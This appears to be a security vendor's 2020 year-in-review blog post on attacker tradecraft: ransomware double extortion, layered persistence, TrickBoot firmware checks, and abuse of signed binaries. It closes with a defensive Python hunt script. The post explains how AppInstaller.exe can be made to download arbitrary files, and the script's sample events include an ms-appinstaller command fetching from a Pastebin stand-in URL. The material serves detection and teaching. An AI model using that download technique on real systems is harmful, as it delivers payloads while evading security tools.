As the year-that-must-not-be-named comes to a close, we’ve decided to take a look back at some of the more interesting — and innovative — hacker tradecraft we saw over these past 12 months.
We also covered this topic on our most recent Tradecraft Tuesday episode — go give it a watch if you’d prefer to recap the year via video. Otherwise, keep reading for the top tactics, techniques and procedures (TTPs) that captured our attention in 2020!
It’s no secret that this year has brought its changes — but it has also brought some of the same old TTPs we’ve always seen, just with different actors. And that’s important to call out because if you don’t protect yourself from what’s stayed the same, you’ll probably get pwned by the things that have changed.
In the spirit of old vs. new, let’s dive into what has (or has not) evolved when it comes to these threats and tradecraft.
Hackers Get More Tactical with Ransomware
If you’re a hacker in 2020, ransomware is truly the gift that keeps on giving. This year started right after the peak of the 2019 campaigns that targeted MSPs and their remote management tools. 2019 was a ruthless year for MSPs because attackers were weaponizing you, or more precisely your tooling and your privileged access, to push ransomware out to your entire client base in one go. We even uncovered how one criminal attempted to sell access to an MSP on the dark web!
But as the year progressed, these ransomware incidents involving MSPs started to trend slightly downward. Don’t get me wrong, attackers were still using ransomware to monetize their attacks, but MSPs were no longer the target du jour.
This year, we saw attackers shift their focus to more high-value victims in what’s known as “big-game hunting.” Essentially, adversaries set their sights on targets where the likelihood of a large payout is higher — like back in June when several Fortune 500 companies were targeted, or in October when the victims were hospitals and healthcare providers.
Another major change when it came to ransomware was where in the attack cycle it was used. Back in 2019, we’d typically see that as soon as an attacker gained initial access and made their way in, they would immediately drop the ransomware of their choice, and the encryption would happen within a few minutes.
More recently, attackers have been taking considerably longer to initiate the encryption and make the ransom demand. Instead, they maintain a foothold, perform their enumeration and poke around. Once they land on a machine, they look at what’s on it, what it has access to, what data is reachable and whether they’ve hit a target that could pay a lot. Basically, they find the goods, exfiltrate them and only then start the encryption. Why? Because now they have leverage for yet another trend that emerged more and more this year: double extortion.
Double extortion is a cruel one-two punch. The first extortion happens when the hacker encrypts your files and you have to pay up to get access back. Then they hit you with, “we have a copy of your files and we’re either going to sell it, disclose it or tell auditors you’ve been compromised unless you pay us again.” That second payment buys nothing you can verify: once the data has left your network there is no way to confirm the attacker’s copy was ever deleted, which is why the exfiltration stage, and not just the encryption, is the one to detect and stop.
And to add insult to injury, attackers have caught on to the fact that a successful extortion means finding and destroying any backups you may have, so some specifically target the backup servers (and the credentials that administer them) to remove that recovery option. The practical counter is a backup copy the attacker cannot reach from a compromised domain: offline or immutable storage, administered with credentials that are not domain-joined, and restore tests that prove it actually works.
Persistence: Piling on the Indirection
Persistence covers the techniques an adversary uses to keep their foothold through reboots, logoffs and credential changes. As we hinted at earlier, attackers are establishing persistence so they can silently snoop around a machine before they drop ransomware or take another action. And when it comes to persistence, the tried-and-true methods are still the most common.
We’re still seeing just as many scheduled tasks, services, shortcuts in the startup folder and other footholds like the ones we covered in our Tradecraft Tuesday episode dedicated to persistence. But hackers are piling on more layers of obfuscation and indirection, such as a scheduled task that runs a VBScript, which runs a batch file, which finally launches the actual payload. The persistence mechanism is the same; the difference is that the task’s command line now points at wscript.exe and an innocuous-looking script rather than at the payload, so a detection that only keys on the final binary’s name or path never fires. The useful hunt is for the chain itself: a script host launching a command interpreter launching an executable from a user-writable location, regardless of what any single file is called.
To stay in the fight, attackers are constantly looking for ways to deepen their foothold. We saw this recently when TrickBot gained a new module, dubbed TrickBoot, designed to inspect the UEFI/BIOS firmware of targeted systems. This is persistence for your persistence. As reported, the module so far only checks whether the platform’s SPI flash write protections are enabled, reading the BIOS control registers through a legitimately signed third-party hardware-access driver; no firmware implant had been observed at the time of writing. But if the firmware reports as writable, TrickBoot has the opportunity to implant UEFI/BIOS persistence, giving the attacker the ability to reinfect the device even after an OS wipe and reimage. The defensive check is correspondingly concrete: verify that firmware write protection is actually engaged across your fleet and keep firmware updated, because this is not something a disk wipe will fix.
This just goes to show the lengths that attackers are taking to adapt their persistence efforts and hide in plain sight in order to evade detection… which brings us to our next section.
Defense Evasion: Same Game, Different Players
Defense evasion consists of the techniques adversaries use to avoid being detected throughout their compromise.
Over the course of 2020, defense evasion both stayed the same and changed. What stayed the same is how attackers use it: avoiding detection by hiding in trusted processes, using legitimate applications to obfuscate malicious scripts, and disabling security software, among other things. What changed is which applications they reach for, because attackers keep swapping in different trusted binaries as the old ones get flagged.
Take App Installer, for example. Twitter user @notwhickey found that AppInstaller.exe, a Microsoft-signed binary, can be coaxed into downloading a file from Pastebin: the ms-appinstaller: URI scheme accepts a source URL, so a plain `start` of that URI from a command prompt spawns AppInstaller.exe and has it fetch whatever the URL points at into a folder under its package’s local app data, where forfiles can locate it so it can be executed in a second step. That is a download cradle running inside a trusted, signed Microsoft process, with none of the PowerShell or certutil command lines defenders have learned to watch for.
I found a way to download arbitrary files with AppInstaller.exe (signed by MS). `start` calls the default URI handler, spawns AppInstaller.exe, and downloads an arbitrary file which you can find using forfiles. #lolbin #lolbas #appinstaller pic.twitter.com/JoLvjLi7Ld
— ¬ whickey (@notwhickey) December 1, 2020
Attackers constantly use techniques like this and adapt their tactics to confuse and bypass security products. The silver lining is that operating system vendors are shipping controls that help keep up: Windows Defender Application Control, for example, comes with a Microsoft-maintained recommended block list of abusable signed binaries, and the LOLBAS project catalogs each newly discovered one so that detection content can follow quickly.
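The two hunts described in the persistence section (a scheduled task reaching its payload through wscript.exe and cmd.exe) and in the App Installer example above both come down to the same thing: looking at process ancestry and command lines rather than at any single file. The following is an added example written for this article, not Huntress code and not anything @notwhickey published. It assumes process-creation telemetry (the kind Sysmon Event ID 1 or an EDR exports) flattened to one JSON object per line with pid, ppid, image and cmdline fields; that field layout, the interpreter list, the trusted-domain allowlist and every event in the sample are constructed for the illustration.

```python
"""Hunt process-creation events for (a) payloads reached through stacked
interpreters (wscript.exe -> cmd.exe -> payload) and (b) ms-appinstaller:
URIs that make AppInstaller.exe fetch a file from an untrusted host.
Constructed example: field names are an assumed export format, and the
sample events below are made up."""
import json
import re
from urllib.parse import urlparse

# Script/command hosts attackers stack for indirection (assumed list; add
# rundll32.exe, regsvr32.exe etc. as your environment warrants).
INTERPRETERS = {"wscript.exe", "cscript.exe", "cmd.exe",
                "powershell.exe", "pwsh.exe", "mshta.exe"}

# Domains AppInstaller is expected to fetch packages from (assumed allowlist).
TRUSTED_SOURCE_DOMAINS = ("microsoft.com", "windows.net")

APPINSTALLER_URI = re.compile(r'ms-appinstaller://\?source=([^\s"]+)', re.IGNORECASE)

# Constructed events: a scheduled task -> VBScript -> batch -> payload chain
# (pids 100-400), a benign one-hop task (500-600), and two ms-appinstaller:
# invocations, one from Pastebin and one from a trusted domain (700, 800).
SAMPLE_EVENTS = r"""
{"pid": 100, "ppid": 1,   "image": "C:\\Windows\\System32\\svchost.exe",  "cmdline": "svchost.exe -k netsvcs -p -s Schedule"}
{"pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\wscript.exe",  "cmdline": "wscript.exe //B C:\\ProgramData\\update.vbs"}
{"pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\cmd.exe",      "cmdline": "cmd.exe /c C:\\ProgramData\\run.bat"}
{"pid": 400, "ppid": 300, "image": "C:\\ProgramData\\svc.exe",            "cmdline": "svc.exe"}
{"pid": 500, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe",      "cmdline": "cmd.exe /c C:\\Scripts\\cleanup.bat"}
{"pid": 600, "ppid": 500, "image": "C:\\Windows\\System32\\robocopy.exe", "cmdline": "robocopy.exe C:\\Logs D:\\Archive /MIR"}
{"pid": 700, "ppid": 50,  "image": "C:\\Windows\\System32\\cmd.exe",      "cmdline": "cmd.exe /c start ms-appinstaller://?source=https://pastebin.com/raw/EXAMPLE"}
{"pid": 800, "ppid": 50,  "image": "C:\\Windows\\System32\\cmd.exe",      "cmdline": "cmd.exe /c start ms-appinstaller://?source=https://apps.microsoft.com/pkg/contoso.msix"}
"""


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """One JSON object per line -> {pid: event}."""
    events = {}
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            events[ev["pid"]] = ev
    return events


def ancestry(events, pid):
    """The process and its known ancestors, child first; stops at a missing
    parent or a pid cycle (pids get reused, so cycles are possible in real data)."""
    chain, seen = [], set()
    while pid in events and pid not in seen:
        seen.add(pid)
        chain.append(events[pid])
        pid = events[pid]["ppid"]
    return chain


def persistence_origin(launcher):
    """Heuristic label for the first non-interpreter ancestor. Assumption: on
    Windows 10 scheduled tasks run under the Schedule svchost instance,
    startup-folder items under explorer.exe, services under services.exe."""
    if launcher is None:
        return "unknown"
    img = basename(launcher["image"])
    if img == "svchost.exe" and "-s schedule" in launcher["cmdline"].lower():
        return "scheduled task"
    if img == "explorer.exe":
        return "startup folder/shortcut or interactive user"
    if img == "services.exe":
        return "service"
    return img


def find_indirection_chains(events, min_hops=2):
    """Flag processes whose immediate ancestry stacks >= min_hops interpreters.
    An interpreter that still has a child in the data is skipped so each chain
    is reported once, at its deepest process."""
    parents = {ev["ppid"] for ev in events.values()}
    findings = []
    for pid, ev in events.items():
        if basename(ev["image"]) in INTERPRETERS and pid in parents:
            continue
        nodes, launcher = [ev], None
        for node in ancestry(events, pid)[1:]:
            nodes.append(node)
            if basename(node["image"]) not in INTERPRETERS:
                launcher = node   # first non-interpreter ancestor: the launcher
                break
        hops = sum(basename(n["image"]) in INTERPRETERS for n in nodes)
        if hops >= min_hops:
            findings.append({"pid": pid,
                             "chain": " <- ".join(basename(n["image"]) for n in nodes),
                             "origin": persistence_origin(launcher)})
    return findings


def _trusted(host):
    return any(host == d or host.endswith("." + d) for d in TRUSTED_SOURCE_DOMAINS)


def find_appinstaller_sources(events):
    """Every ms-appinstaller: source URL on a command line, host checked
    against the allowlist (a non-allowlisted host is the LOLBin download)."""
    findings = []
    for pid, ev in events.items():
        for m in APPINSTALLER_URI.finditer(ev["cmdline"]):
            host = (urlparse(m.group(1)).hostname or "").lower()
            findings.append({"pid": pid, "source": m.group(1),
                             "host": host, "trusted": _trusted(host)})
    return findings


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for f in find_indirection_chains(evs):
        print(f"[indirection] pid {f['pid']}: {f['chain']} (origin: {f['origin']})")
    for f in find_appinstaller_sources(evs):
        if not f["trusted"]:
            print(f"[appinstaller] pid {f['pid']} fetched from {f['host']}: {f['source']}")
```

Run against the sample, the chain hunt reports only pid 400 (svc.exe reached through cmd.exe and wscript.exe from the Schedule svchost) and stays quiet on the one-hop cleanup task, while the AppInstaller hunt surfaces the Pastebin fetch and passes the Microsoft-hosted one. On real telemetry the interesting tuning knobs are the interpreter list, whether the final image sits in a user-writable path, and the allowlist, which should be as short as your environment permits.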
• • •
Year after year, attackers have shown us how they continue to learn and mature (and some are even starting to combine forces). For us defenders, we have to respond by continuing to solve these problems as a community, leveling up our cybersecurity knowledge and evolving ahead of the threats around us.
So, what will 2021 have in store for us? After this year, it’s hard to tell — but one thing we do know is that as long as hackers keep hacking, we’ll keep hunting.